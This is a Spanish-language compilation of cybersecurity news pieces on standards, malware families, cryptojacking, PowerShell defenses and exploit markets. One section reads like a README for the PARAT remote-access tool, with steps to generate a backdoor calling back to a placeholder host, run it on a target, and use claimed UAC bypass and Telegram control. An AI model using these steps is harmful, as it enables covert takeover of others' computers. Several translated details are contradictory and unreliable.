Hace unos meses, el Instituto Nacional de Estándares y Tecnología (NIST por sus siglas en ingles) hizo una publicación para mejorar la seguridad cibernética de infraestructura crítica, conocido comúnmente como Cybersecurity Framework. Esto trajo muchas dudas si ya se está familiarizado con ISO 27001.
Cybersecurity Framework se diseñó inicialmente para las empresas de EE. UU. Que se consideran parte de la infraestructura crítica. No obstante, es adecuado para ser utilizado por cualquier organización que enfrenta riesgos de seguridad cibernética.
Por otro lado, ISO / IEC 27001 es una norma de seguridad cibernética publicada en 2005 y revisada en 2013. Si bien no es obligatorio, se acepta en la mayoría de los países como un marco principal para la implementación de la seguridad de datos. Describe el sistema de gestión de la seguridad de datos y sitúa la seguridad en el contexto de la gestión y los procesos generales de una empresa.
Tanto Cybersecurity Framework como ISO 27001 le brindan la metodología sobre cómo implementar la seguridad cibernética en una organización. Podría implementar cualquiera de estos. Probablemente la mayor similitud es que ambos se basan en la gestión del riesgo: esto significa que ambos requieren que las salvaguardas se implementen solo si se detectan riesgos de seguridad cibernética.
Cybersecurity Framework
Cybersecurity Framework claramente está mejor estructurado cuando se trata de planificación e implementación.
Framework Core está dividido en funciones; Identificar, Proteger, Detectar, Responder y Recuperar, y luego en 22 Categorías relacionadas, por ejemplo, Gestión de Activos, Gestión de Riesgos, etc. similares a las secciones en ISO 27001. 98 subcategorías, y para cada subcategoría se hacen varias referencias a otros marcos como ISO 27001, COBIT, NIST SP 800-53, ISA 62443 y CCS CSC. De esta manera, es muy fácil ver cuáles son los requisitos y dónde encontrar la manera de implementarlos.
Niveles de Implementación de Cybersecurity Framework; Parcial, informado de riesgo, repetible y adaptable. De esta manera, una empresa puede decidir fácilmente hasta dónde quiere llegar con su implementación, teniendo en cuenta los requisitos.
Entonces es el perfil del marco; Perfil actual, Perfil de destino y otros ayudan a las imágenes en las que se encuentra la organización en este momento, relacionadas con las categorías y subcategorías de Framework Core, y dónde quiere estar. Además, Framework Profiles podría usarse para establecer los requisitos mínimos para otras organizaciones como proveedores o socios. Esto no existe en ISO 27001
En general, Cybersecurity Framework permite que tanto la alta dirección como los ingenieros y demás personal de TI comprendan fácilmente qué se debe implementar y dónde están las vulnerabilidades.
ISO 27001
Una de las mayores ventajas de ISO 27001 es que las empresas pueden certificarse por ella, esto significa que una empresa puede demostrar a sus clientes, socios, accionistas, agencias gubernamentales y otros que pueden mantener su información segura.
Además, ISO 27001 es un estándar aceptado y reconocido internacionalmente: si una empresa desea demostrar su capacidad a sus clientes, socios y gobiernos fuera de su país, ISO 27001 será mucho mejor.
ISO 27001 se enfoca en proteger todo tipo de información, no solo la información procesada en los sistemas de TI. Es cierto que la información en papel tiene cada vez menos importancia, pero para algunas compañías tal información aún puede presentar riesgos significativos. ISO 27001 define qué documentos y registros son necesarios, y cuál es el mínimo que debe implementarse.
Finalmente, mientras que Cybersecurity Framework se enfoca solo en cómo planificar e implementar la seguridad cibernética, ISO 27001 adopta un enfoque mucho más amplio, su metodología se basa en el ciclo Planificar, Hacer, Verificar, Actuar (PDCA), lo que significa que construye el sistema de gestión que mantiene y mejora todo el sistema. Sin una medición constante, revisión, auditoría, acciones correctivas y mejoras, dicho sistema se deteriorará gradualmente y finalmente perderá su propósito.
Cual es mejor
Esto no debe ser una cuestión de uno u otro, me parece que sería mejor combinarlos. En realidad, Cybersecurity Framework sugiere que puede complementarse fácilmente con otro programa o sistema, e ISO 27001 ha demostrado ser un muy buen marco general para diferentes metodologías de seguridad de datos.
Por lo tanto, creo que se pueden lograr los mejores resultados si el diseño de la seguridad de datos completa se establece de acuerdo con ISO 27001 y utilizar Cybersecurity Framework en lo que respecta a la gestión de riesgos y la implementación de las áreas y salvaguardas de seguridad particulares.
Esta vez el nuevo malware se dirige a macOS y viene con capacidades de keylogging. Los investigadores de seguridad cibernética han descubierto un nuevo malware llamado Coldroot que no ha sido detectado por los programas de antivirus ya que solo 18 de las 20 herramientas pudieron detectarlo. Este malware Mac es un troyano de acceso aleatorio, RAT por sus siglas en ingles, que se compartió en línea en Github en 2016.
Coldroot ahora es capaz de afectar a todos los sistemas operativos y puede obtener de forma silenciosa control remoto en una computadora vulnerable. Los detalles de Coldroot fueron revelados públicamente por un investigador de seguridad de datos y jefe de la investigación, Patrick Wardle.
Wardle identificó que era un malware de “característica completa, actualmente no detectada” y que estaba siendo vendido por su sospechoso autor Coldzer0 en la Dark Web desde el 1 de enero de 2017. También, Coldzer0 publicó un video que muestra que Coldroot RAT multiplataforma se puede utilizar para apuntar a MacOS, Linux y sistemas basados en Windows. Coldzer0 también ofrecía a los clientes información sobre los métodos de personalización de malware.
El malware se identificó en un controlador de audio ilegítimo de Apple llamado “com.apple.audio.driver2.app”. Este se muestra como un documento y solicita acceso de administrador, luego se instala silenciosamente y se comunica con su servidor de C & C para obtener instrucciones. Una vez que el usuario hace clic en él, aparece un mensaje emergente que parece un mensaje de autenticación normal. Solicita las credenciales de MacOS del usuario. Cuando se proporcionan, Coldroot modifica la base de datos de privacidad de TCC.db, lo que permite que el malware tenga acceso para realizar un keylogging en el sistema.
El malware se las arregla para permanecer en el sistema infectado instalándose como un demonio de lanzamiento. Asimismo, el código se inicia automáticamente cada vez que se enciende la computadora infectada.
El malware es capaz de realizar capturas de pantalla, iniciar y finalizar procesos, buscar y cargar archivos, iniciar una sesión de escritorio remoto y apagar el sistema operativo de forma remota. No está claro si la versión reciente de Coldroot es la misma que se cargó hace dos años o si es una versión modificada de ese malware.
El experto en seguridad cibernética afirmó que es posible que el malware no pueda afectar a los sistemas operativos más nuevos, como MacOS High Sierra, porque el TCC.db del sistema está protegido a través de la Protección de Integridad del Sistema (SIP). Ahora lo mejor para mantenerse protegidos, es cambiar a la última versión del sistema operativo.
En este artículo trataremos de dar una explicación simple y fácil de seguir de por qué todo el mundo habla de esto y por qué también debería actualizar su seguridad de datos.
En pocas palabras, ahora los hackers pueden robar su dinero y su información, mientras aumentan su factura de energía y posiblemente destruyan el hardware de su computadora.
Primero debemos saber lo que es Blockchain, es el principio básico de Bitcoin y la mayoría de las otras criptomonedas.
Blockchain, resolvió un desafío muy grande. Un archivo digital puede ser copiado, modificado o falsificado. Si bien no se puede obtener una factura directamente de un proveedor y dársela a su amigo, se puede copiar una factura digital para que dos personas puedan gastar esa factura exacta, explica un experto en seguridad cibernética.
También había otro problema, para verificar que la factura era original y no una copia o una falsificación, necesitabas que alguien realmente verificara. Al poner esto en manos de un tercero, los usuarios quedan expuestos a muchos riesgos.
El protocolo Blockchain elimina al intermediario al hacer que todos sean participantes activos en la transacción. Nuestro especialista en seguridad de datos nos dice que con Blockchain, cada vez que alguien realiza una transacción, esa transacción se registra en un bloque para que permanezca permanentemente disponible. A medida que más y más personas envían dinero, se crean cada vez más bloques y se vinculan entre sí en la cadena. Si alguien quisiera hackear una transacción o duplicarla, tendría que atacar toda la cadena de bloques.
Las personas o máquinas que vinculan estas transacciones se llaman mineros. A cambio de una pequeña tarifa, vinculan las transacciones y crean los bloques que se agregarán a la cadena. En algunos casos, hay computadoras especiales diseñadas específicamente para minar criptomonedas, llamadas ASIC.
En el pasado, los hackers intentaron robar la información de su tarjeta de crédito para que pudieran usar su dinero. Ahora, los hackers pueden robar los recursos de su computadora para crear dinero.
Con Bitcoin, el robo es posible. Sin embargo, el proceso de minería de Bitcoin ahora requiere demasiados recursos para las configuraciones regulares y se realiza en hardware especializado.
Con Monero, robar es extremadamente fácil. Porque se puede hacer en una computadora común. Monero también es anónimo e imposible de rastrear. Incluso si las autoridades estuvieran dispuestas a ayudarlo en caso de un ataque, Monero les hace casi imposible identificar a los autores, de acuerdo a un especialista en seguridad cibernética.
Ahora hay que saber que es CoinHive, es un minero de Monero que usa Javascript, el lenguaje de programación más popular. Este código se puede incrustar en cualquier página web. Una vez que accede a esa página, utiliza el procesador de su computadora para extraer Monero.
Los hackers pueden dirigirse a los sitios web que visitas e implementar el script de CoinHive. Le ha sucedido a miles de sitios web, desde pizzerías, blogs, organizaciones de salud y páginas gubernamentales.
Tal ataque se llama cryptojacking, que es un “secuestro de criptomonedas”. Se roba el poder de procesamiento de la computadora para crear criptomonedas y obtener ganancias rápidas e imposibles de rastrear. Básicamente, convierte su PC o dispositivo en un minero de Monero. La secuencia de comandos de CoinHive puede usar el 100% de la potencia de la CPU del visitante y, por lo tanto, reducir la vida útil del hardware.
Investigadores de seguridad de datos nos dan algunas medidas de seguridad que ayudan a evitar estos ataques.
Protege siempre tu computadora con un antivirus, aunque el malware moderno puede escapar de él. También necesita una solución antimalware para detectar las amenazas antes de que lleguen a su PC.
En cualquier navegador, tanto en escritorio como en dispositivos móviles, use un bloqueador de anuncios. Actualice siempre su software, porque la mayoría de los ataques se llevan a cabo debido a vulnerabilidades sin parches.
Siempre use contraseñas seguras o un administrador de contraseñas seguro para que, en caso de un ataque, su información personal no se vea comprometida.
El lenguaje de scripting de fuente abierta, es la herramienta de movimiento lateral perfecta para los atacantes una vez que han comprometido una red. Y los scripts de PowerShell pueden ejecutarse solo en la memoria, dando lugar al término malware “sin archivos”.
“El lenguaje de scripting PowerShell de Microsoft, es extremadamente popular entre los administradores de TI. Pero los hackers también lo están tomando cada vez más”, comenta un experto en seguridad cibernética, “los scripts maliciosos de PowerShell pueden ser difíciles de detectar y aun más difíciles de investigar porque dejan pocos rastros forenses”.
“PowerShell es tan poderoso y versátil en el sentido de que tiene acceso al framework .NET, acceso a WMI, acceso a prácticamente cualquier parte de la máquina”, dice Arafeh, refiriéndose a Windows Management Instrumentation, la infraestructura para datos de gestión y operaciones en sistemas operativos basados en Windows.
Microsoft ha estado trabajando en una variedad de tecnologías de seguridad de datos que ayudan a los administradores a detener el abuso de PowerShell, presenta tres herramientas esenciales para ayudar a prevenir estos ataques. El objetivo es reducir la capacidad de los atacantes de doblar las herramientas legítimas para fines maliciosos.
Modo de lenguaje restringido
Los administradores pueden establecer la función de idioma restringido de PowerShell, que corta las acciones potencialmente peligrosas, como invocar API de Windows arbitrarias. Pero eso no impide que los atacantes inicien otra instancia de PowerShell con todas las capacidades de idioma.
La solución de Microsoft es que el modo de idioma restringido se use con un software de control de aplicaciones. De esta forma, cuando PowerShell detecta una política UMCI, permanecerá en modo de idioma restringido.
“Estas políticas de bloqueo son importantes para los sistemas de alto valor que deben protegerse contra administradores maliciosos o credenciales de administrador comprometidas”, según una publicación de Microsoft. “Con una política aplicada, incluso los administradores están limitados a lo que pueden hacer en el sistema.”
Registro profundo
La función registrará todas las secuencias de comandos de bloques que procesa PowerShell, incluidas aquellas que emplean la generación de código dinámico, que puede ser un intento de evadir la detección.
De manera predeterminada, PowerShell graba bloques de script la primera vez que se usa uno, pero se puede configurar para que se grabe cada vez que se ejecute el mismo. Eso puede conducir a un registro voluminoso de eventos, por lo que has sido advertido. Pero los registros posteriores podrían proporcionar cierto alcance en torno a lo que intentaban hacer los atacantes.
Un profesional de seguridad cibernética nos dice que; la mayoría de las empresas solo se dan cuenta de la necesidad de habilitar el registro de secuencias de comandos después de que sea demasiado tarde, pero, PowerShell registra automáticamente bloques de scripts cuando tienen contenido utilizado a menudo por scripts maliciosos. Este registro de bloques de scripts automáticos no tiene como objetivo reemplazar el registro de bloqueo de scripts o antivirus, solo sirve como un último recurso.
Interfaz de exploración Anti-Malware
En Windows 10, Microsoft agregó una función de seguridad de datos llamada Interfaz de escaneo anti-malware, o AMSI, que tiene la intención de ayudar a desenrollar y analizar las secuencias de comandos enmascaradas o cifradas.
Codificar los guiones es una de las formas en que los atacantes esperan que su código no sea atrapado. Pero al final de la línea, las secuencias de comandos ofuscadas deben desenredarse para que se ejecuten en el motor de scripts.
Las aplicaciones pueden llamar a la API de AMSI para verificar el script de PowerShell. Proveedores de antivirus también aprovechan AMSI, Microsoft lo usa en varios productos, incluyendo Windows Defender AV y Windows Defender EDR, es una herramienta de seguridad de datos posterior a la explotación para explorar ataques que inicialmente no fueron detectados.
“Mientras el anti-malware pueda usar AMSI para mirar el contenido del script, entonces usted tiene la capacidad de aprender sobre lo que está haciendo el script y bloquear cualquier comportamiento malicioso”, dice Arafeh.
Un nuevo ransomware basado en las películas de terror Annabelle. Descubierto por un investigador de seguridad cibernética. Annabelle Ransomware, incluye terminar numerosos programas de seguridad, deshabilitar Windows Defender, apagar el firewall, encriptar archivos, tratar de propagar a través de unidades USB, hacerlo para que no pueda ejecutar una variedad de programas, y luego sobrescribe el registro maestro de arranque de la computadora infectada con un cargador de arranque.
Un grupo de investigadores de seguridad de datos, fue capaz de extraer el código fuente del ejecutable lo que ayuda a entender lo que hace este programa.
Cuando se ejecute por primera vez, Annabelle se configurará para iniciarse automáticamente cuando inicie sesión en Windows. Luego finaliza una variedad de programas como Process Hacker, Process Explorer, Msconfig, Task Manager, Chrome y más.
Posteriormente, configura las entradas de registro de Ejecución de archivos de imagen para que no pueda iniciar una variedad de programas como los enumerados anteriormente y otros como Notepad ++, Bloc de notas, Internet Explorer, Chrome, Opera, bcdedit y muchos más.
El ransomware intentará expandirse utilizando archivos autoru.inf. Un experto en seguridad cibernética nos dice que este método es bastante inútil cuando se trata de versiones más nuevas de Windows que no admiten una función de reproducción automática.
Después, comenzará a encriptar la computadora con una clave estática. Al encriptar archivos, agregará la extensión .ANNABELLE al nombre del archivo encriptado.
Luego reiniciará la computadora y cuando el usuario inicie sesión, se mostrará la pantalla de bloqueo. La pantalla de bloqueo tiene un botón de créditos que, al hacer clic, muestra la pantalla a continuación que indica que un desarrollador llamado iCoreX0812 creó el programa y una forma de contactarlos en Discord.
Como toque final, el desarrollador decidió ejecutar también un programa que reemplaza el registro de inicio maestro de la computadora infectada para que muestre una pantalla de “accesorios” cuando la computadora se reinicia.
Un especialista en seguridad cibernética comento que, en general este ransomware fue desarrollado para ser un PITA y para mostrar las habilidades del desarrollador en lugar de generar realmente pagos de rescate.
Este ransomware se basa en Stupid Ransomware y es fácilmente descifrable. Como utiliza una clave estática, se puede actualizar su StupidDecryptor para descifrar esta variante.
Al reemplazar el MBR, ejecutar Rkill en modo seguro para limpiar las entradas de registro de IFEO, usar StupidDecryptor para descifrar los archivos y luego algunos escaneos de seguridad de datos para eliminar los remanentes, debería poder hacer que su computadora vuelva a la normalidad.
De acuerdo con especialistas en seguridad informática; un Troyano de Acceso Remoto (RAT) es un tipo de malware que controla un sistema a través de una conexión de red remota como por acceso físico. Si bien el uso compartido de escritorio y la administración remota tienen muchos usos legales, RAT generalmente se asocia con actividad criminal. Una RAT se instala sin que la víctima lo sepa y tratará de ocultar su operación a la víctima y al software de Anti Virus.
PARAT es una herramienta de administración remota basada en Python y socket abierto con múltiples hilos. Utiliza principalmente Python core y usa IPv4 para comunicación y autocifrado local y remoto para su privacidad.
PARAT tiene dos intérpretes:
Modo local
Modo remoto
Cuando inicias el PARAT usando Python2 main.py, te redirigen al modo local y allí puedes:
Controlar opciones locales, cambiar elementos de UI, hacer ediciones, usar shell unix, establecer puertos de escucha y generar una puerta trasera, por mencionar algunos, no debemos olvidar que algunos comandos locales están disponibles en modo remoto.
Puede acceder al modo remoto solo cuando tiene conexiones conectadas, usando session -c ID reemplazando el ID con un identificador de objetivos. Aquí el experto en seguridad cibernética, tiene acceso completo a la máquina de destino y también puede realizar acciones remotas.
También puede establecer la contraseña local para el cliente PARAT y las conexiones remotas usar el algoritmo de cifrado automáticamente.
Aunque existen diferentes y mejores opciones para manejar la multiplicidad, deciden usar el módulo de enhebrado para hacer esto. La razón de esta elección es que PARAT es una herramienta simple y diseñada solo para fines educativos. Dejan de usar instrumentos más sofisticados en ese aspecto. También es necesario señalar que puede escuchar puertos diferentes al mismo tiempo utilizando esta función.
Solo haz estos pasos:
Entran al menú principal de PARAT usando Python2 main.py
Hacer que el uso de la puerta trasera genere -i yourhost.ddns.net -p 4444 -o backdoor.pyw
Ejecutar backdoor.pyw en el objetivo
Jugar con el objetivo en modo remoto, usando sesiones -c 1
También escucha en el puerto usando listen -p your_port
Change log:
Compatible con las versiones de Python 2 y 3 Copie y pegue en su terminal:
git clone https://github.com/micle-fm/Parat&& cd Parat && python main.py
Puede necesitar instalar python -m easy_install pypiwin32 en algunos destinos.
Características
Totalmente indetectable (FUD)
Compatible con Telegram Messenger
Windows Bypass Control de cuenta de usuario (UAC)
Ejecución de memoria
No hay requisitos para configurar
Telegram
Puede comunicar PARAT usando telegram messanger. Para esto haz los pasos:
Abra el archivo telegram.service en un editor
Inserta tu token de bot en la línea 15, reemplazado en YOUR_BOT_TOKEN
Una vulnerabilidad parchada se utiliza para atacar los sistemas Android con una Herramienta de Acceso Remoto (RAT por sus siglas en ingles).
Los estudios realizados por expertos en seguridad informática han detectado una nueva variante de AndroRAT, que puede inyectar root exploits, lo que permite a los atacantes acceder al dispositivo. AndroRAT aprovecha el CVE-2015-1805, que se hizo público y parcheó en 2016, y solo afecta a los dispositivos Android anteriores.
Profesionales en seguridad cibernética comentan que AndroRat se creó en 2012 como un proyecto universitario para permitir el acceso remoto a dispositivos Android, pero los hackers también encontraron otro uso para él.
Los especialistas en seguridad informática explican que la nueva variante pretende ser una aplicación de utilidades llamada TrashCleaner, que probablemente se distribuye a través de una URL maliciosa.
La primera vez que AndroRAT se ejecuta, instala una aplicación de calculadora etiquetada en chino que se parece al que normalmente viene incluido con cualquier dispositivo Android. El icono de la calculadora suplanta el ícono del TrashCleaner. El malware se puede controlar de forma remota, de a cuerdo a los informes de los expertos en seguridad cibernética.
Algunos de los nuevos bits de robo incluyen; robo de información de la red móvil, capacidad de almacenamiento, aplicaciones instaladas, historial de navegación web de los navegadores pre instalados, calendario de eventos, registro de llamadas, subir archivos al dispositivo víctima, utilizar la cámara frontal, borrar y enviar SMS, captura de pantalla, ejecución de comandos shell y contraseñas de Wi-Fi.
Se descubrió una vulnerabilidad de Zero-Day en la versión de escritorio de la aplicación de Telegram encriptada de extremo a extremo, esta se estaba explotando para propagar un malware que minaba criptomonedas como Monero y ZCash.
La vulnerabilidad de Telegram fue descubierta por el investigador de seguridad informática Alexey Firsh en octubre pasado, esto afecto solo usuarios de Windows.
La falla ha sido explotada desde marzo de 2017 por atacantes que engañaron a las víctimas para descargar software malicioso en sus computadoras que usan para obtener mayor poder de CPU para extraer criptomonedas o servir como puerta trasera para que los hackers controlen remotamente la máquina afectada, de acuerdo a una investigación realizada por una empresa de seguridad cibernética.
Durante el análisis, los expertos en seguridad informática encontraron escenarios de explotación de Zero-Day por parte de los hackers.
Principalmente la falla fue explotada para entregar un malware de minería de criptomonedas, que usa la potencia de cómputo de PC de la víctima para extraer distintos tipos de criptomonedas.
Al analizar los servidores de los hackers, los investigadores también encontraron archivos que contenían un caché local de Telegram que había sido robado a las víctimas.
Los profesionales en seguridad cibernética también encontraron, que los hackers explotaron con éxito la vulnerabilidad para instalar un troyano de puerta trasera que usaba la interfaz de programación de la aplicación (API) de Telegram como un protocolo de comando y control, lo que permitía a los hackers obtener acceso remoto a la computadora de la víctima.
“Después de la instalación, comenzó a funcionar en modo silencioso, lo que permitió que el hacker permaneciera desapercibido en la red y ejecutara diferentes comandos, incluida la instalación adicional de herramientas de spyware”, agregó la empresa de seguridad informática.
En primera instancia se cree que la vulnerabilidad Zero-Day fue explotada solo por hackers rusos, dado que un colaborador de la empresa de seguridad cibernética dijo que “…todos los casos de explotación que se detectaron ocurrían en Rusia”.
El Instituto Internacional de Seguridad Cibernética dijo que la mejor manera de protegerse de tales ataques no es descargar o abrir archivos de fuentes desconocidas o no confiables, también recomendó a los usuarios evitar compartir información personal confidencial en las aplicaciones de mensajería y asegurarse de tener un buen software antivirus de una compañía confiable instalada en sus sistemas.
La compañía comercializadora de exploits privados está ampliando su alcance para adquirir errores en compilaciones Linux.
De acuerdo a informes de diversas empresas de seguridad informática, Zerodium está ofreciendo $ 45,000 a los hackers dispuestos a reportar de forma privada las vulnerabilidades zero-day en el sistema operativo Linux.
Hasta el día 31 de marzo, Zerodium está dispuesto a ofrecer mayores pagos a los expertos en seguridad informática, hasta $45,000 por exploits de tipo LPE.
Las vulnerabilidades de tipo zero-day deberían funcionar con instalaciones predeterminadas de Linux, como las versiones de Ubuntu, Debian, CentOS, Red Hat Enterprise Linux (RHEL) y Fedora.
Como sabemos muchos proveedores de tecnología, incluidos Google, Apple y Microsoft, ofrecen recompensas financieras por informes de vulnerabilidades, estos informes se utilizan para parchar el software y proteger los dispositivos de los usuarios. La empresa Zerodium es diferente a las compañías que buscan ayuda externa para descubrir vulnerabilidades.
La compañía compra vulnerabilidades en una amplia gama de dispositivos y sistemas de destino, como Microsoft Windows, Google Chrome, Android, Apple OS X y varios servidores de correo electrónico, para vender esta información de forma privada a los clientes; individualmente, a través de las firmas de investigación en seguridad informática o de empresas especializadas en exploits zero-day.
Colaboradores del Instituto Internacional de Seguridad Cibernética dicen, que los clientes pueden incluir agencias gubernamentales ya que requieren exploits para diversos fines, como el cifrado del dispositivo de última hora o la supervisión encubierta.
Zerodium ha ofrecido recompensas que alcanzaron más de un millón de dólares en el pasado. En el pasado, la compañía ofreció $ 1.5 millones a los expertos en seguridad informática para trabajar con exploits de iOS 10. Las recompensas aumentan dependiendo de la demanda del vendedor de exploits.
Según comunicados de empresas de seguridad informática como WebImprints, el año pasado, los gobiernos pidieron prohibiciones o puertas traseras obligatorias en aplicaciones cifradas y servicios de cifrado de extremo a extremo. Teniendo un cambio en las prioridades del gobierno, Zerodium aumentó los pagos de recompensas en 2017 hasta $500,000 por fallas zero-day en aplicaciones encriptadas, como iMessage, Telegram y WhatsApp.
El aumento en el precio de las vulnerabilidades de Linux sugiere que puede haber una gran demanda en el mercado en este momento. Zerodium generalmente ofrece hasta $ 30,000 a los investigadores en seguridad informática por una vulnerabilidad zero-day de Linux, pero con el fin de aumentar los envíos, ahora ha aumentado en $ 15,000.
En septiembre, Zerodium atrajo a los investigadores con pagos de $1 millón por exploits que trabajan contra el explorador Tor.
Creemos que nuestro iPhone hackeado es algo que no puede suceder, pero las grandes compañías pagan grandes sumas de dinero a los expertos en seguridad informática para encontrar los errores y las lagunas. Si bien no vale la pena entrar en pánico, es bueno tomar precauciones. Por supuesto que alguien puede hackear tu iPhone. Pero puedes hacer mucho para proteger tu iPhone y protegerlo de posibles hackers. El Instituto Internacional de Seguridad Cibernética da consejos para implementar la mayor seguridad informática posible.
Actualizar tu iPhone a la última versión
La actualización de los dispositivos iOS al último software es la mejor manera de asegurarse de que sus dispositivos estén lo más protegidos posible de los hackers. Con cada actualización, Apple mejora las funciones de seguridad informática y soluciona los puntos débiles.
Habilitar la autenticación de dos factores
Cuando la Autenticación de Dos Factores está habilitada, debe usar un dispositivo confiable para iniciar sesión en un nuevo dispositivo.
Activar Buscar mi iPhone
Esto es obvio. Cuando está activada Buscar mi iPhone, puede ver la ubicación de sus dispositivos desde cualquiera de sus dispositivos o desde cualquier computadora a través de iCloud.
Cambiar a un código de acceso de seis dígitos
Si bien puede parecer un inconveniente agregar dos dígitos adicionales a su contraseña, vale la pena la seguridad adicional.
Configure su teléfono para autodestruirse
No realmente, pero lo suficientemente cerca. Puede activar una configuración que borrará su dispositivo después de diez intentos fallidos de código de acceso.
Sea inteligente al abrir mensajes y correos electrónicos
Una gran forma que muchos hackers obtendrán de la información de su iPhone de forma remota es a través de enlaces de malware y correos electrónicos fraudulentos.
Cambie su contraseña de ID de Apple regularmente
Cambiar la contraseña de su ID de Apple regularmente es la mejor manera de asegurarse de que nadie acceda sin su permiso. Recomiendan empresas de seguridad informática crear una nueva contraseña de Apple ID cada seis meses.
Usar solo estaciones de carga confiables
Si estás en un aprieto y necesitas usar un espacio público de carga, solo asegúrate de que sea legítimo y no solo un cargador aleatorio que aparezca allí.
Se han encontrado una nueva variedad de malware de punto de venta conocida como PoS, por sus siglas en ingles. Expertos del Instituto Internacional de Seguridad Cibernética, comentaron que este malware se disfraza como un paquete de servicio de LogMeIn para ocultar el robo de datos de clientes.
La semana pasada, los investigadores en seguridad informática, Robert Neumann y Luke Somerville dijeron en una publicación que una nueva familia de malware, denominada UDPoS, intenta disfrazarse como servicios legítimos para evitar la detección al transferir datos robados.
En una muestra del malware descubierto recientemente por una firma de seguridad informática, se noto que este se disfraza como una función de LogMeIn, este es un sistema de acceso remoto legítimo que se usa para administrar computadoras y otros sistemas de forma remota.
Este paquete de servicios falso generó cantidades notables de solicitudes inusuales de DNS, según el equipo y tras una investigación adicional, se descubrió que el sistema falso de LogMein era en realidad malware PoS.
El malware PoS acecha en los sistemas de seguridad informática donde la información de la tarjeta de crédito se procesa y se almacena potencialmente, como en tiendas y restaurantes. Si un sistema de punto de venta está infectado, malware como DEXTER o BlackPOS robará los datos de la tarjeta contenidos en la banda magnética de la tarjeta de crédito, antes de enviar esta información a su operador a través de un servidor de comando y control (C & C).
La información robada se puede usar para crear tarjetas de duplicación de bancos, borrar cuentas bancarias y, posiblemente, también para robo de identidad.
Apenas en 2013, la empresa estadounidense Target fue víctima de malware PoS y con esto fue robada la información de la tarjeta de crédito de aproximadamente 110 millones de clientes.
En lo que las empresas de seguridad informática como WebImprints llaman algo inusual, el nuevo malware UDPoS utiliza nombres de archivos con temática de LogMein y URL de C & C para ocultar su tráfico basado en DNS.
En las pruebas realizadas a la muestra tomada del malware, logmeinumon.exe, se puede ver que este se enlaza con un servidor de C & C alojado en Suiza y contiene un cuentagotas y archivos autoextraíbles que extrae el contenido de los directorios temporales.
A su vez, se crea un directorio LogMeInUpdService junto con un servicio del sistema para habilitar la persistencia, y luego entra en juego un componente de monitoreo.
“Este componente de monitoreo tiene una estructura casi idéntica al componente de servicio”, dicen los expertos en seguridad informática. “Es compilado por la misma versión de Visual Studio y utiliza la misma técnica de codificación de cadenas: ambos contienen solo unas pocas cadenas de texto plano identificables, y en su lugar usan un cifrado básico y un método de codificación para ocultar cadenas como el servidor C2, nombres de archivos y nombres de proceso codificados “.
Toda la información obtenida, como la información de la tarjeta del cliente, luego se recopila y se envía a través del tráfico del DNS disfrazado como LogMein.
“Casi todas las empresas tienen firewalls y otras protecciones para monitorear y filtrar las comunicaciones basadas en TCP y UDP, sin embargo, a menudo se sigue tratando el DNS de manera diferente brindando una oportunidad de oro para filtrar datos”, señalan colaboradores de una firma de seguridad informática.
Compañías especializadas en seguridad informática, enfatizan que el uso de los temas de LogMein es simplemente una forma de camuflar las actividades del malware, y después de revelar los hallazgos a la empresa de software remoto, no se ha encontrado evidencia de abuso del producto o servicio.
Aun no se tienen pruebas de si este malware se usa o no en la naturaleza, pero la compilación del malware fue el 25 de octubre de 2017, por lo que esta puede ser una campaña nueva.
Por otro lado, los investigadores en seguridad informática dicen que hay evidencia de una “variante anterior con temas de Intel”, que sugiere que UDPoS puede ser la próxima evolución en malware operacional que ha sido modificado para ser más exitoso y enfocarse en nuevas víctimas.
Por su parte, LogMein dio una declaración:
“LogMeIn no proporciona este enlace, archivo o archivo ejecutable, y las actualizaciones de los productos de LogMeIn, incluidos los parches, las actualizaciones, etc., siempre se entregarán de forma segura dentro del producto.
Nunca nos contactaremos con una solicitud para actualizar su software que también incluye un archivo adjunto o un enlace a una nueva versión o actualización”.
Alrededor del 10 por ciento de las credenciales de correo electrónico de todos los empleados en las compañías Fortune 500 se han filtrado en la deep web, según un nuevo estudio del Instituto Internacional de Seguridad Cibernética
El reporte de VeriCloud incluye, información de un periodo de 3 años, que analizó a 27 millones de empleados de Fortune 500 y encontró aproximadamente 2,7 millones de credenciales entre los ocho mil millones de credenciales robadas que se encuentran en la Deep Web. Si eso no es lo suficientemente malo. VeriCloud encontró que la información robada fue encontrada en múltiples eso incremento la posibilidad de que los agentes malintencionados los compraran y los utilizaran. La buena noticia es que el número representa un descenso del 7,5 por ciento con respecto a 2016.
Cyber Security 